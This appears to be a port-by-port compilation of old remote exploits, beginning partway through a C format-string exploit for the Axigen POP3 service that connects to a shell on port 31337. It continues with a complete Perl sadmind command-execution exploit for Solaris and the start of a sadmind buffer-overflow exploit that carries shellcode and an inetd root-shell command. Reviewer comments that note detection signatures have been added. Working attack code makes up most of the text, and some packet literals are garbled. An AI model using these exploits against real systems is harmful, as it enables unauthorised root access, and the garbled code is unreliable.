exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}

/*
 * Thin wrapper around send(): writes `len` bytes of `src` to `sock` with no
 * flags and returns whatever send() returns (bytes written, or -1 on error).
 */
static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
return send (sock, src, len, 0);
}

/*
 * Resolve `host`, open a TCP socket and connect it to `port`.
 * Returns the connected descriptor.  Every failure is reported with perror()
 * and terminates the process (note the mixed exit codes: -1 for socket() and
 * gethostbyname() failures, EXIT_FAILURE for connect()).
 *
 * NOTE(review): gethostbyname() is IPv4-only and obsolete; `host` is passed
 * as u_char* where a const char* is expected.  struct sockaddr_in / AF_INET
 * come in only indirectly through <netdb.h> here - presumably fine on the
 * platform this was written for, confirm before building elsewhere.
 */
static int sockami (u_char * host, int port){ /* create the socket */

struct sockaddr_in address;
struct hostent *hp;
int sock;

fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
perror ("socket()");
exit (-1);
}

if ((hp = gethostbyname (host)) == NULL){
perror ("gethostbyname()");
exit (-1);
}

/* first resolved address only; h_length bytes copied straight into sin_addr */
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);

if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}

/*
 * Driver: connect to `host`:PORT_POP3, write formatString without reading
 * the server greeting, wait two seconds, then connect to port 31337 and
 * hand that socket to shell().  Does not return (shell() never returns).
 *
 * Observable pattern for defenders: a client that sends data before the
 * POP3 banner is consumed, followed ~2 s later by a second connection from
 * the same source to TCP 31337.  The first socket is never closed and the
 * sock_send() return value is ignored.
 */
static void formatme (u_char * host){ /* do the evil */

int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("\n+Sending format string\n");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2); /* give the service time to process the request before connecting back */
printf ("+Connecting to Shell ");
sock = sockami (host, 31337); /* descriptor of the first connection is overwritten, not closed */
printf ("- Done\n");
shell(sock);

}

/*
 * Entry point: prints a banner, requires exactly one argument (the host) and
 * delegates to formatme(), which never returns.  With no argument the usage
 * text goes to stderr and the process exits with EXIT_SUCCESS.
 *
 * NOTE(review): main() has no return statement on the fall-through path
 * (C99 treats that as return 0; older compilers may warn).
 */
int main (int argc, char **argv){ /* go figure */

printf ("Axigen 2.0 beta Remote pop3 exploit\n"
"by: <[email protected]>\n\n");

if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
exit (EXIT_SUCCESS);
}

formatme (argv[1]);
}

// [2007-02-18]


انتهينا من بورت 110
نبدأ بـ بورت 111

111 Solaris Sadmind Default Configuration Remote Root Exploit



#!/usr/bin/perl -w
##################

##
# Title: rootdown.pl
# Purpose: Solaris Remote command execution via sadmind
# Author: H D Moore hdm at metasploit.com
# Copyright: Copyright (C) 2003 METASPLOIT.COM
##


use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;

my $VERSION = "1.0";
my %opts;

# -h host, -p sadmind port, -c command, -r portmapper port, -i interactive, -v info
getopts("h:p:c:r:iv", \%opts);

if ($opts{v}) { show_info() }

if (! $opts{h}) { usage() }

my $target_host = $opts{h};

# Placeholder host name; replaced below with the name the service reports.
my $target_name = "exploit";

# "\$\$" is escaped so the remote shell, not this script, expands the PID;
# the default command only drops a marker file in /tmp on the target.
my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
my $portmap = $opts{r} ? $opts{r} : 111;


##
# Determine the port used by sadmind
##

# Program 100232 version 10 is sadmind; -p skips the portmapper lookup.
# Note: rpc_getport() returns undef on any reply that is not 28 bytes long.
my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);

if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}

##
# Determine the hostname of the target
##

# A request carrying the wrong host name is expected to be rejected with a
# "Security exception on host <name>." message, which discloses the real
# name the service wants to see.  That information leak is what makes the
# forged credential in rpc_sadmin_exec() possible.
my $s = rpc_socket($target_host, $target_port);
my $x = rpc_sadmin_exec($target_name, "id");
print $s $x;
my $r = rpc_read($s);
close ($s);

if ($r && $r =~ m/Security exception on host (.*)\. USER/)
{
$target_name = $1;
} else {
print STDERR "Error: could not obtain target hostname.\n";
exit(0);
}


##
# Execute commands :)
##


my $interactive = 0;

if ($opts{i}) { $interactive++ }

# One request per loop iteration; loops until command_prompt() exits the
# process when interactive, otherwise runs exactly once.
do {

if ($opts{i}) { $command = command_prompt() } else
{
print STDERR "Executing command on '$target_name' via port $target_port\n";
}

$s = rpc_socket($target_host, $target_port);
$x = rpc_sadmin_exec($target_name, $command);
print $s $x;
$r = rpc_read($s);
close ($s);

# The reply is classified only by its length and by the four (or twelve)
# bytes at offset 24; anything not 36 bytes long is echoed raw.
if ($r)
{
# Command Failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
{
print STDERR "Error: something went wrong with the RPC format.\n";
exit(0);
}

# Command might have failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
{
print STDERR "Error: something may have gone wrong with the sadmind format\n";
}

# Confirmed success
if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
{
print STDERR "Success: your command has been executed successfully.\n";
}

if (length($r) != 36) { print STDERR "Unknown Response: $r\n" }

} else {
# rpc_read() gives up after 4 s; UDP, so a lost datagram looks the same.
print STDERR "Error: no response recieved, you may want to try again.\n";
exit(0);
}

} while ($interactive);

# Every exit path (including the error ones above) uses status 0.
exit(0);

# Print the command-line synopsis to STDERR and terminate with status 0.
sub usage {
    my @synopsis = (
        "\n",
        "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n",
        " Usage: $0 -h <target> -c <command> [options]\n",
        " Options:\n",
        " -i\tStart interactive mode (for multiple commands)\n",
        " -p\tAvoid the portmapper and use this sadmind port\n",
        " -r\tQuery alternate portmapper on this UDP port\n",
        " -v\tDisplay information about this exploit\n",
        "\n\n",
    );
    print STDERR $_ for @synopsis;
    exit(0);
}

# Print the author's description of the weakness (default AUTH_SYS
# credentials plus a traversal in the method name) to STDOUT and exit with
# status 0.  The text is the page's own explanation of the issue; the
# mitigation it implies is to not run sadmind with the default security
# level and to restrict RPC access to the service.
sub show_info {

print "\n\n";
print " Name: rootdown.pl\n";
print " Author: H D Moore <hdm\@metasploit.com>\n";
print "Version: $VERSION\n\n";

# not finished :)
print
"This exploit targets a weakness in the default security settings
of the sadmind RPC application. This application is installed and
enabled by default on most versions of the Solaris operating
system.\n\n".

"The sadmind application defaults to a weak security mode known as
AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
the service will accept a structure containing the user and group
IDs as well as the originating system name. These values are not
validated in any form and are completely controlled by the client.
If the standard sadmin RPC API calls are used to generate the request,
the ADM_CLIENT_HOST parameter is filled in with the hostname of the
client system. If the RPC packet is modified so that this field is
set to the hostname of the remote system, it will be processed as
if it was a local request. If the user ID is set to zero or the
value of any user in the sysadmin group, it is possible to call
arbitrary methods in any class available to sadmind.\n\n".

"If the Solstice AdminSuite client software has not been installed,
the only class available is 'system', which only contains a single
method called 'admpipe'. The strings within this program seem to
suggest that it can be used run arbitrary commands, however I chose
a different method of command execution. Since each method is simply
an executable in the class directory, it is possible to use a
standard directory traversal attack to execute any application.
We can pass arguments to these methods using the standard API.

An example of spawning a shell which executes the 'id' command:

# apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".

"To exploit this vulnerability, we must create a RPC packet that
calls the '/bin/sh' method, passing it the parameter of the command
we want to execute. To do this, packet dumps of the 'apm' tool
were obtained and the format was slowly mapped. The hostname of
the target system must be known for this exploit to work, however
when sadmind is called with the wrong name, it replies with a
'ACCESS DENIED' error message containing the correct name. The
final code does the following:

1) Queries the portmapper to determine the sadmind port
2) Sends an invalid request to sadmind to obtain the hostname
3) Uses the hostname to forge the RPC packet and execute commands


This vulnerability was reported by Mark Zielinski and disclosed by iDefense.

Related URLs:

- http://www.idefense.com/advisory/09.16.03.txt
- http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
";





exit(0);
}

# Interactive-mode prompt: read one line from STDIN and return it without
# its trailing newline.  An empty line, "quit" or "exit" (any case) prints a
# farewell and ends the program with status 0.
sub command_prompt {
    select(STDOUT); $|++;

    print STDOUT "\nsadmind> ";
    my $line = <STDIN>;
    chomp($line);
    my $wants_out = !$line || grep { lc($line) eq $_ } qw(quit exit);
    if ($wants_out) {
        print "\nExiting interactive mode...\n";
        exit(0);
    }
    return ($line)
}

# Open a UDP socket to ($target_host, $target_port), make it and STDOUT
# unbuffered, switch it to non-blocking mode and return it.  Creation
# failure prints the error and exits the process with status 0.
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);

if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}

# autoflush the socket, then restore STDOUT as the default output handle
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}

# Wait up to 4 seconds for $s to become readable and, for every handle
# reported ready (only $s is registered), append one <$s> read to the
# result.  Returns undef when nothing arrived in time.
sub rpc_read {
    my ($s) = @_;
    my $res;
    my $selector = IO::Select->new($s);
    $res .= <$s> for $selector->can_read(4);
    return $res;
}

# Set O_NONBLOCK on $fd, preserving its other file-status flags.
# Returns the result of the F_SETFL fcntl() call.
sub nonblock {
    my ($fd) = @_;
    my $current = fcntl($fd, F_GETFL, 0);
    return fcntl($fd, F_SETFL, $current | O_NONBLOCK);
}

# Ask the portmapper at ($target_host, $target_port) for the UDP port of RPC
# program $prog version $vers (PORTMAP v2 GETPORT, procedure 3).
# Returns the port, or undef when no 28-byte reply arrives within the
# rpc_read() timeout.  The XID is packed with "L" (native byte order), every
# other field with "N" (big-endian, as RPC requires).
#
# For defenders: a GETPORT query for program 100232 (sadmind) from an
# unexpected source is the first step of this script and easy to log at
# the portmapper.
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;

my $s = rpc_socket($target_host, $target_port);

my $portmap_req =

pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0

print $s $portmap_req;

my $r = rpc_read($s);
close ($s);

# A GETPORT reply is 24 bytes of RPC header followed by the 4-byte port.
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}

# NOTE(review): "return undef" yields a one-element list in list context;
# callers here use scalar context, so it is harmless as written.
return undef;
}


# Build one sadmind request datagram for $hostname that invokes the method
# "../../../../../bin/sh" of class "system" with arguments "-c" and
# $command.  Returns the raw packet bytes.
#
# What makes this work (all visible below): the AUTH_UNIX credential carries
# UID 0 / GID 0 and uses the *target's own* host name as the machine name,
# and the method name is a directory traversal.  For detection, the string
# "../../../../../bin/sh" inside an RPC call to program 100232 (0x00018788)
# is a precise signature; for mitigation, do not run sadmind with the
# default AUTH_SYS security level and restrict who can reach the service.
#
# NOTE(review): several literals below contain a stray space ("\x 00")
# from line wrapping on this page; in a Perl double-quoted string that is
# presumably chr(0) followed by " 00", so this copy does not produce the
# byte layout the comments describe.
sub rpc_sadmin_exec {

my ($hostname, $command) = @_;
# NUL-padded to 59 bytes; a longer $hostname would make the repeat count
# negative (empty padding) and break the fixed-size fields that assume 59.
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));


my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in

# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }

# AUTH_UNIX body: stamp, machine name, uid, gid, gids.  Nothing here is
# verified by the server in AUTH_SYS mode - that is the weakness.
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .

# Machine Name
pack("N", length($hostname)) . $rpc_hostname .

"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups


# credential length + body, then an 8-byte (AUTH_NULL) verifier
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);

my $header =

# Another Time Stamp
reverse(pack("L", time() + 20005)) .

"\x00\x07\x45\xdf".

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".

"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND

"\x00\x00\x00\x0a\x00\x00\x00\x04".

"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND

"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".

"\x00\x00\x00\x3b". $packed_host.

"\x00\x00\x00\x00\x06" . "system".

"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";

# Append Body Length ^-- Here

# Argument list: name / type / length / value records, terminated by
# "netmgt_endofargs".  $command is NUL-padded to a fixed 512 bytes, so a
# longer command would shift every following field.
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"0810:1010101010:1"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
"\x00\x00\x00\x15". "../../../../../bin/sh" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".

# ADM_CLIENT_HOST is set to the target's own name so the request is
# treated as local (see the explanation in show_info()).
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".

"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x09" . "ADM_FENCE" .
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".

$command . ("\x00" x (512 - length($command))).

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";

# The length word between header and body is derived empirically
# (body + 4 + header - 330); the 330 presumably matches a fixed prefix of
# the captured packets the author mapped - unverified here.
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;

return($res);
}



# [2003-09-19]


111 Solaris sadmind Remote Buffer Overflow Exploit



/************************************************** ***********************\
** **
** Super Solaris sadmin Exploit by optyx <[email protected]> **
** based on sadminsparc. and sadminx86.c by Cheez Whiz **
** **
\************************************************* ************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <rpc/rpc.h>

/*
 * Per-architecture payload data, indexed by `a = arch / 2` in exp()
 * (0 = SPARC tables, 1 = x86 tables): two machine-code stubs, the buffer
 * and address-block sizes, the nop pattern and the candidate stack
 * addresses for each of the four targets listed in usage().
 *
 * `command` is what the payload ultimately runs: it writes an inetd
 * configuration line for a root shell on the "ingreslock" service into
 * /tmp/.x, starts a second inetd on that file and deletes it.  For
 * defenders, an extra inetd process started with a /tmp config file and a
 * listener on the ingreslock port that is not in /etc/inetd.conf are the
 * host-side artefacts to look for; main() also connects to "ingreslock"
 * with telnet afterwards.
 *
 * NOTE(review): nops[0] = 0x801bc00f does not fit a signed 32-bit long;
 * the conversion is implementation-defined on such platforms.
 */
char shellsparc[] =
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff"
"\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"
"\xec\x02\x3f\xf0\xac\x22\x80\x16\xae\x02\x60\x10"
"\xee\x22\x3f\xf0\xae\x05\xe0\x08\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf4\xae\x05\xe0\x03\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf8\xae\x05\xc0\x16\xc0\x2d\xff\xff"
"\xc0\x22\x3f\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff"
"\x2d\x63\xff";

char shellx86[] =
"\xeb\x45\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31"
"\xc0\x89\x46\xb7\x88\x46\xbc\x31\xc0\x50\x56\x8b"
"\x1e\xf7\xdb\x89\xf7\x83\xc7\x10\x57\x89\x3e\x83"
"\xc7\x08\x88\x47\xff\x89\x7e\x04\x83\xc7\x03\x88"
"\x47\xff\x89\x7e\x08\x01\xdf\x88\x47\xff\x89\x46"
"\x0c\xb0\x3b\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\xff\x2d\x63\xff";


/* { SPARC, x86 } */
int buflen[] = { 1076, 1056 }; /* total payload size handed to CLIENT_DOMAIN */
int addrlen[] = { 560, 8 }; /* bytes of return-address block */
int lens[] = { 84, 76 }; /* offset patched with the command length; SPARC also uses it as nop count*4 */
int offset[] = { 688, 572 }; /* added to sp to form the jump target */
int alignment[] = { 4, 0 };
long int nops[] = { 0x801bc00f, 0x90 };
int junks[] = { 512, 536 }; /* x86 only, indexed by arch - 2 */
char command[] = "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' "
"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;";

/* one guessed stack address per usage() architecture number 0..3 */
unsigned long int sp[] = { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };

#define FRAMELEN1 608
#define FRAMELEN2 4200

#define NETMGT_PROG 100232
#define NETMGT_VERS 10
#define NETMGT_PROC_PING 0
#define NETMGT_PROC_SERVICE 1

#define NETMGT_UDP_PING_TIMEOUT 30
#define NETMGT_UDP_PING_RETRY_TIMEOUT 5
#define NETMGT_UDP_SERVICE_TIMEOUT 1
#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2

#define NETMGT_HEADER_TYPE 6
#define NETMGT_ARG_INT 3
#define NETMGT_ARG_STRING 9
#define NETMGT_ENDOFARGS "netmgt_endofargs"

#define FW_VERSION "VERSION"
#define CLIENT_DOMAIN "CLIENT_DOMAIN"
#define FENCE "FENCE"

/*
 * Request header as this program marshals it.  The field names are purely
 * positional (the layout presumably comes from captured traffic rather
 * than a published spec); see xdr_nm_send_header() for the wire order.
 * Only inaddr1 is ever encoded - inaddr2 and inaddr3 are skipped there.
 */
struct nm_send_header {
struct timeval timeval1;
struct timeval timeval2;
struct timeval timeval3;
unsigned int uint1;
unsigned int uint2; /* set to NETMGT_HEADER_TYPE by exp() */
unsigned int uint3;
unsigned int uint4;
unsigned int uint5;
struct in_addr inaddr1;
struct in_addr inaddr2;
unsigned long ulong1;
unsigned long ulong2;
struct in_addr inaddr3;
unsigned long ulong3;
unsigned long ulong4;
unsigned long ulong5;
struct timeval timeval4;
unsigned int uint6;
struct timeval timeval5;
char *string1;
char *string2;
char *string3;
unsigned int uint7; /* exp() stores the computed length of the argument section here */
};

/* One integer argument record: name, type tag (NETMGT_ARG_INT), size, value, two trailing words. */
struct nm_send_arg_int {
char *string1;
unsigned int uint1;
unsigned int uint2;
int int1;
unsigned int uint3;
unsigned int uint4;
};

/* One string argument record: name, type tag (NETMGT_ARG_STRING), length, value, two trailing words.
 * exp() uses this record to carry the oversized CLIENT_DOMAIN value. */
struct nm_send_arg_string {
char *string1;
unsigned int uint1;
unsigned int uint2;
char *string2;
unsigned int uint3;
unsigned int uint4;
};

/* Terminator record; exp() sets string1 to NETMGT_ENDOFARGS. */
struct nm_send_footer {
char *string1;
};

/* Complete request: header, three argument records in fixed order, footer. */
struct nm_send {
struct nm_send_header header;
struct nm_send_arg_int version;
struct nm_send_arg_string string;
struct nm_send_arg_int fence;
struct nm_send_footer footer;
};

/* Reply decoded by xdr_nm_reply(); string1 is allocated by the XDR layer on decode. */
struct nm_reply {
unsigned int uint1;
unsigned int uint2;
char *string1;
};

/*
 * XDR filter for struct nm_send_header.  Field order on the wire: three
 * timevals (as long pairs), uint1..uint5, inaddr1 as a counted opaque of
 * sizeof(struct in_addr), ulong1..ulong5, timeval4, uint6, timeval5, the
 * three strings, uint7.  inaddr2 and inaddr3 are never encoded.
 * Returns FALSE as soon as one primitive filter fails.
 *
 * NOTE(review): tv_sec/tv_usec are passed to xdr_long() as if they were
 * long; on platforms where they are not, this is a type mismatch - confirm
 * for the build target.
 */
bool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)
{
char *addr;
size_t size = sizeof(struct in_addr);

if(!xdr_long(xdrs, &objp->timeval1.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval1.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint5))
return (FALSE);
/* `size` doubles as the actual length and the maximum accepted on decode */
addr = (char *) &objp->inaddr1.s_addr;
if(!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong1))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong2))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong3))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong4))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong5))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint6))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_usec))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint7))
return (FALSE);
return (TRUE);
}

/*
 * XDR filter for struct nm_send_arg_int: name string, two uints, the int
 * value, two uints.  Returns FALSE on the first failing primitive.
 */
bool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_int(xdrs, &objp->int1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}

/*
 * XDR filter for struct nm_send_arg_string: name string, two uints, the
 * value string (xdr_wrapstring, so unbounded length), two uints.
 * Returns FALSE on the first failing primitive.
 */
bool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}

/* XDR filter for struct nm_send_footer: a single string. */
bool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}

/*
 * XDR filter for the whole request: header, then the version / string /
 * fence argument records in that fixed order, then the footer.
 * Passed to clnt_call() by exp().
 */
bool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)
{
if(!xdr_nm_send_header(xdrs, &objp->header))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->version))
return (FALSE);
if(!xdr_nm_send_arg_string(xdrs, &objp->string))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->fence))
return (FALSE);
if(!xdr_nm_send_footer(xdrs, &objp->footer))
return (FALSE);
return (TRUE);
}

/*
 * XDR filter for struct nm_reply: two uints and a string.  On decode,
 * xdr_wrapstring() allocates string1 (presumably only when the pointer is
 * NULL beforehand - exp() does not zero `reply` before the call).
 */
bool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)
{
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}

/*
 * Print the command-line synopsis for `prog` and the architecture table to
 * stderr, then terminate the process with exit status -1.
 */
void usage(char *prog)
{
static const char *const arch_lines[] = {
"\tarchitectures:\n",
"\t0 - Solaris SPARC 2.6\n",
"\t1 - Solaris SPARC 2.7 (7.0)\n",
"\t2 - Solaris x86 2.6\n",
"\t3 - Solaris x86 2.7 (7.0)\n\n",
};
size_t i;

fprintf(stderr, "usage: %s -t target -a arch [-s size] [-i increment] [-p]\n", prog);
for (i = 0; i < sizeof arch_lines / sizeof arch_lines[0]; i++)
fputs(arch_lines[i], stderr);

exit(-1);
}

/*
 * Build one request for `host` and send it with the guessed stack address
 * `sp`.  `arch` is the usage() architecture number 0..3; `a = arch / 2`
 * selects the SPARC (0) or x86 (1) column of the global tables.
 * With `pinging` set, only NETMGT_PROC_PING is called (a liveness check).
 * Returns 0 in every non-fatal case; several paths exit() instead.
 *
 * The request is an ordinary sadmind call authenticated with
 * authunix_create("localhost", 0, 0, ...) - AUTH_UNIX, uid 0 - whose
 * CLIENT_DOMAIN string argument is buflen[a] bytes long.  A call that
 * *succeeds* is treated as failure (the service survived), a timeout as
 * "now check if exploit worked".  For defenders: an RPC call to program
 * 100232 with a kilobyte-sized CLIENT_DOMAIN argument is the thing to
 * alert on; main() sends many of these in a loop, one per address guess.
 *
